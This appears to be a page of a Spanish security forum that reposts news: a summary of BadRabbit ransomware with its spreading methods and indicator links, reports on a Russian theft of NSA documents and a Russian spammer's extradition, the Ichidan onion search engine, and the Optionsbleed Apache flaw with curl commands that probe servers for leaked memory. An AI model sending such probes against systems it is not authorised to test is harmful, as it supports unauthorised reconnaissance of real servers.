      Algunos han despertado hoy reviviendo viejas pesadillas con el ransomware... los sistemas del Metro de Kiev, el aeropuerto de Odessa y varias organizaciones en Rusia confirmaban que sus sistemas informáticos se habían visto bloqueados debido a que los archivos del sistema operativo habían sido cifrados por un ransomware, esta vez el turno es del denominado BadRabbit.

      La amenaza se extiende a otros países de Europa del Este: Alemania, Turquía, Bulgaria, Montenegro... conviene fijar la mirada a este nuevo y lucrativo malware, para lo que me quedo con la síntesis del repositorio de Github de Royce Williams y las noticias que van surgiendo.

      BadRabbit es un ransomware que es capaz de propagarse de forma local a través de SMB. Para llevar a cabo el proceso de infección utiliza ingeniería social, haciéndose pasar por un instalador de Adobe Flash Player. Una vez haya infectado la computadora inicial, intentará esparcirse a través de la red local utilizando una lista de nombres de usuario y contraseñas, por lo que resulta determinante utilizar un nombre de usuario y sobre todo una contraseña que no sean sencillas de adivinar. Como método de esparcimiento de momento se descarta la utilización de la vulnerabilidad de SMB utilizada por WannaCry y NotPetya.

      Bad Rabbit no solo cifra los ficheros personales que encuentre utilizando claves RSA 2048, añadiéndoles la extensión .encrypted, sino que además también cifra el MBR del disco duro utilizando DiskCryptor, una herramienta de cifrado completo de disco Open Source. Para el pago del rescate pide 0,05 bitcoins que se tienen que pagar mediante la red Tor.



      Hasta ahora, es dirigido principalmente a Rusia y Ucrania, además de otros países (Alemania, Turquía, Bulgaria, Montenegro). Aunque parece que no se autopropaga a nivel mundial, podría dirigirse a objetivos seleccionados a propósito. Las mitigaciones son similares a las de Petya / NotPetya.


      Infección inicial

      Aparece como una actualización de flash falsa:



      Es probable que las infecciones sean del tipo Watering-Hole/Drive-By, pero también pueden ser dirigidas selectivamente.
      Lista de extensiones de archivo específicas

          Imagen Tweet: https://twitter.com/craiu/status/922877184494260227
          Texto: https://pastebin.com/CwZfyY2F


      Componentes y métodos:

      Usa el binario legítimo y firmado de DiskCryptor para cifrar
      Está casi confirmado que usa EternalBlue (o al menos activa controles que están a la espera de su uso)
      Incorpora Mimikatz.
      Da un mensaje de usuario "por favor apague el antivirus" en algunas circunstancias.
      También se propaga a través de SMB y WebDAV,  autopropagandose localmente: https://twitter.com/GossiTheDog/status/922875805033730048
      Usa una lista de credenciales hardcodeadas:https://pastebin.com/01C05L0C
      C:\WINDOWS\cscc.dat == DiskCryptor (¿bloquea la ejecución para inocularse?)
      https://www.virustotal.com/#/file/682adcb55fe4649f7b22505a54a9dbc454b4090fc2bb84af7db5b0908f3b7806/details
      C:\Windows\infpub.dat == #BADRABBIT "pushed" lateralmente (¿bloquea la ejecución para inocularse?). Al parecer, crear una versión de solo lectura de este archivo    puede detener la infección:
      https://twitter.com/0xAmit/status/922886907796819968
      Análisis del componente flash_install.php:
      https://www.hybrid-analysis.com/sample/630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da?environmentId=100
      Video en acción: https://twitter.com/GossiTheDog/status/922858264534142976
      Al parecer, borra los registros de Windows y el journal del sistema de archivos
      ¿También instala un keylogger?
      ¿Limpia el sector de arranque y pone kernel al final de la unidad?
      Podría ser una variante de Diskcoder
      Los C&C y los dominios del payload fueron instalados previamente con mucha antelación:
          https://twitter.com/mrjohnkelly73/status/922899328636735488
          https://twitter.com/craiu/status/922911496497238021
          El 13% del código es reusado de NotPetya
          https://analyze.intezer.com/#/analyses/d41e8a98-a106-4b4f-9b7c-fd9e2c80ca7d
      10 diferencias entre el código de Petya y el de BadRabbit:
          https://twitter.com/GroupIB_GIB/status/922958914089562112
      Análisis interactivo de BadRabbit.exe:
          https://app.any.run/tasks/9198fd01-5898-4db9-8188-6ad2ad4f0af3
      Regla de Yara (creada por un ingeniero de McAfee)
          https://pastebin.com/Y7pJv3tK
      Referencias de cultura contenidas
              Dragones de Game of Thrones (Drogon, Rhaegal)
              Película de hackers (al final de la lista de contraseñas hardcodeadas)



      Fuente: blog.segu-info.com.ar

      17

      La tensión entre Estados Unidos y Rusia vive, en el último año, uno de los peores momentos desde el fin de la Guerra Fría, y parece que puede ir a peor. Hoy se ha conocido que hackers rusos habrían atacado a la NSA (Agencia Nacional de Seguridad) estadounidense robándoles algunos documentos altamente sensibles y secretos sobre la ciberseguridad del país.

      Según publica el The Wall Street Journal, la violación, considerada la más grave de los últimos años, podría haber abierto una brecha en la ciberseguridad del país y permitido a los 'hackers' de Moscú adentrarse mucho más fácilmente en las redes estadounidenses. La información va más allá y apunta a que los atacantes, que trabajarían para el gobierno de Putin, se habrían hecho con documentos que explican toda la estrategia de seguridad de la NSA.

      Aunque la noticia ha salido a la luz hoy, el ciberataque se habría efectuado en 2015, y las autoridades del país norteamericano lo habrían descubierto en la primavera de 2016. Esto significa que los piratas rusos habrían tenido hasta un año de ventaja para poder moverse con total libertad saltándose las líneas defensivas del enemigo sin demasiado problema.

      En cuanto a lo robado no se sabe a ciencia cierta qué material se pudieron llevar los rusos. Fuentes consultadas por WSJ apuntan que entre ese material habría información sobre cómo trabaja la agencia cuando hay un ciberataque o qué medidas lleva a cabo para adentrarse en sistemas de otros países en misiones de espionaje.

      Fuente: blog.segu-info.com.ar

      18

      La Audiencia Nacional ha accedido a extraditar a Estados Unidos al hacker ruso Pyotr Levashov, detenido el pasado abril en Barcelona y que es reclamado para ser juzgado por captar datos de usuarios de internet e introducir un programa malicioso en sus ordenadores para pedirles un rescate económico, supuestamente.

      La Audiencia Nacional considera que España no es competente para juzgarle pues es en EEUU donde se encuentran las víctimas y los daños producidos por su supuesta actividad delictiva, en consonancia con la postura mantenida por la Fiscalía durante la vista de extradición.

      Estados Unidos acusa a Levashov de haberse beneficiado de Kelihos, una red de ordenadores infectados y controlados sin el conocimiento de sus propietarios y de apropiarse de direcciones de correo electrónico, nombres de usuarios y contraseñas a las que luego distribuía ransomware, un programa malicioso que introduce un código en el ordenador para pedir un rescate económico al dueño.

      La Audiencia considera que la competencia para juzgar al supuesto hacker está definida por el lugar donde se detecta el daño y los intereses afectados, así como el perjuicio económico originado. Por ello considera "indiferente" que Levashov hubiese hackeado desde España.

      En relación a la supuesta motivación política expuesta por la defensa, la Sala señala que el procedimiento de entrega responde "a la existencia de un proceso penal seguido en EEUU" contra el que existe una acusación formal "por delitos comunes" emitida por el Gran Jurado del Tribunal de Distrito de Connecticut, " sin atisbarse la motivación política denunciada".

      Levashov argumentó que temía por su vida y temía ser torturado a cambio de información confidencial por haber trabajado para el partido Rusia Unida, que preside Vladimir Putin. En cambio, los jueces destacan que la defensa no insistió en la vista sobre esa supuesta motivación basada también en informaciones periodísticas que lo vinculaban al equipo de piratas que habría actuado a favor de Donald Trump en la campaña presidencia y contra la demócrata Hillary Clinton.

      Para la Sala, nada de esto se ha acreditado, ni tampoco "la potencial vulneración del derecho a la vida o a la integridad física" del reclamado. Además, rechaza realizar un seguimiento de su situación procesal y penitenciaria cuando sea entregado a Estados Unidos.

      Los hechos con los que se acusa a Levashov son constitutivos de los delitos de asociación ilícita para cometer fraude, robo de identidad, fraude electrónica y escuchas telefónicas ilícitas, entre otros, conforme a la legislación norteamericana.

      La Sala cree que en este caso "se cubre sobradamente el mínimo punitivo de más de un año de prisión" así como el de doble incriminación establecidos en el tratado bilateral entre España y Estados Unidos como para proceder a la entrega del reclamado.

      Su esposa, Maria Levashova, pidió el apoyo de abogados de derechos humanos y del vicepresidente ruso para defender al hacker e impedir su extradición. Considera que Estados Unidos intenta vincularlo con un virus desplegado en la campaña de apoyo a Trump.

      Pyotr Levashov sería la persona que está detrás del alias de Internet Peter Severa (Pedro del Norte, en ruso), conocido por ser uno de los más activos hackers relacionados con los spams (correos electrónicos no solicitados).

      Durante años, Severa habría infectado ordenadores de todo el mundo por medio de software malicioso, para luego vender estos acceso a ordenadores secuestrados con troyanos.


      Fuente:publico.es

      19
      Hacking / Ichidan, clon de Shodan en la Deep Web
      « en: Septiembre 23, 2017, 08:53:11 am »

      Motores de búsqueda como Shodan, Censys o ZoomEye, que permiten buscar dispositivos con servicios expuestos a internet, son ya bastante conocidos. Añado una breve referencia de Wikipedia para aclarar las ideas a la gente que no sepa de ellos:

      Cita de: Wikipedia
      Shodan es un motor de búsqueda que le permite al usuario encontrar iguales o diferentes tipos específicos de equipos (routers, servidores, etc.) conectados a Internet a través de una variedad de filtros. Algunos también lo han descrito como un motor de búsqueda de banners de servicios, que son metadatos que el servidor envía de vuelta al cliente.1​ Esta información puede ser sobre el software de servidor, qué opciones admite el servicio, un mensaje de bienvenida o cualquier otra cosa que el cliente pueda saber antes de interactuar con el servidor.

      Si quereís aprender más de estos buscadores para ampliar información aquí listo unos links:




      Hace unos días, Bleeping Computers encontró un motor de búsqueda de dispositivos con servicios expuestos en la Deep Web. Su nombre es Ichidan, que significa en japones "primera etapa", y se encuentra en la dirección ichidanv34wrx7m7.onion.

      Su interfaz es un clon exacto de Shodan y puedes crear una cuenta sin necesidad de correo electrónico para usar todas sun funcionalidades:


      Probando, he comprobado que los filtros no son tan avanzados como en Shodan, aunque permiten descubrir cosas interesantes. En mi opinión, si continua desarrollandose llegará a ser una herramienta de investigación muy potente.

      Con una búsqueda del puerto 80 encontramos casi 5000 resultados:


      Al igual que en Shodan, nos muestra el top de servicios y el de software. Podemos entrar en detalles para comprobar los banners de los servicios, ver sus versiones, y acceder a más información:


      Accedemos a la url para ver que nos encontramos y... que raro :D:


      Podemos comprobar todos los dispositivos escaneados por este buscador con el query "* ". Se aprecia que no es un número muy elevado si supuestamente ha escaneado gran parte de la Deep Web, y si es así, se confirma que el tamaño de esta red no es tan grande como se piensa.



      Un saludo, HATI  :D

      20
      Noticias Informáticas / Optionsbleed, bug similar a Heartbleed (PARCHEA!)
      « en: Septiembre 20, 2017, 05:30:49 pm »

      Heartbleed es una de las peores vulnerabilidades a las que se ha enfrentado Internet. Descubierto en abril de 2014, este fallo de seguridad en OpenSSL permitía a cualquier usuario conseguir volcados de memoria de cualquier servidor, volcados en los que podía haber todo tipo de información personal, como, por ejemplo, contraseñas. La magnitud de este fallo de seguridad fue tal que, a día de hoy, aunque está más o menos controlado, sigue habiendo miles de servidores vulnerables conectados a Internet. Ahora, una nueva vulnerabilidad similar (en cierto modo), llamada Optionsbleed, vuelve a amenazar Internet, esta vez, por culpa del servidor web Apache.

      Las conexiones HTTP pueden hacer llamadas a varios métodos (como GET y POST, los métodos más utilizados), pudiendo recurrir al método OPTIONS para ver una lista completa con los métodos que tenemos disponibles y podemos utilizar.

      Tal como dice Hanno Bock en The Fuzzing Project, al enviar una petición OPTIONS a las webs más visitadas a nivel mundial según el ranking Alexa, la respuesta, en la mayoría de los casos, viene con un parámetro "Allow" y repetición de "HEAD". Esto puede ser fruto de un desbordamiento de búfer, igual a como ocurría en una primera instancia con OpenSSL y que, finalmente, dio lugar a Heartbleed.

      Aunque de momento no hay un exploit ni una prueba de concepto de este fallo de seguridad, todo apunta a una especie de nuevo Heartbleed, esta vez de la mano del servidor web Apache. De conseguirse explotar, esta vulnerabilidad podría permitir a cualquier atacante conseguir piezas arbitrarias de memoria que podrían contener información sensible, tanto del propio servidor (contraseñas, por ejemplo), como de los usuarios que lo visitan.

      El experto de seguridad que ha dado con esta vulnerabilidad, se ha puesto en contacto con la mayoría de las compañías potencialmente vulnerables a este fallo, y tan solo una ha devuelto el correo, siendo, además, bastante reacia a colaborar en la investigación

      Dentro del Alexa Top 1 Million, tan solo 466 webs se han encontrado como vulnerables a este fallo, aunque al no ser un fallo determinista, puede haber muchos más servidores vulnerables en la lista.

      La vulnerabilidad ya ha sido registrada con el código CVE-2017-9798, aunque, de momento, se encuentra en fase de análisis por parte del NIST.

      Si utilizamos Apache 2.2, este experto de seguridad nos facilita un parche temporal hasta que se analice la vulnerabilidad, se acepte y llegue un parche oficial de la mano de Apache.

      Aunque la vulnerabilidad es similar en la técnica a Heartbleed, en realidad no es tan grave como esta, y es que, además de afectar a un pequeño número de hosts en todo el mundo, los volcados de memoria que devuelve son mucho menores a los que devolvía Heartbleed. Pero es un fallo real, un fallo del que hay que preocuparse e intentar solucionar cuanto antes, y es que, al final, los grandes ataques informáticos siempre vienen a través de estas pequeñas vulnerabilidades.


      ¿Cómo probarlo?

      Simplemente con...

      Código: Bash
      1. curl -D - -X OPTIONS [url]http://localhost[/url]
      2.  
      3. Returns:
      4. HTTP/1.1 200 OK
      5. Date: Thu, 22 Jun 2017 08:40:07 GMT
      6. Server: Apache
      7. Allow: GET,HEAD,POST,OPTIONS,HEAD,HEAD
      8. Content-Length: 0
      9. Content-Type: httpd/unix-directory


      Esto debería devolver UN solo "Allow: HEAD".

      Otro ejemplo:

      Código: [Seleccionar]
      for i in {1..100};
      do curl -sI -X OPTIONS [url]https://www.google.com/[/url] | grep -i "allow:";
      done

      O con esta PoC script en Python.


      Actualizaciones de productos

          Gentoo: Commit (2.2.34 / 2.4.27-r1 fixed), Bug
          NetBSD/pkgsrc: Commit
          Guix: Commit
          Arch Linux: Commit (2.4.27-2 fixed)
          Slackware: Advisory
          NixOS: Commit
          Debian: unfixed, Security Tracker
          NIST
          MITRE




      Fuente: blog.segu-info.com

      Páginas: [1] 2 3 ... 10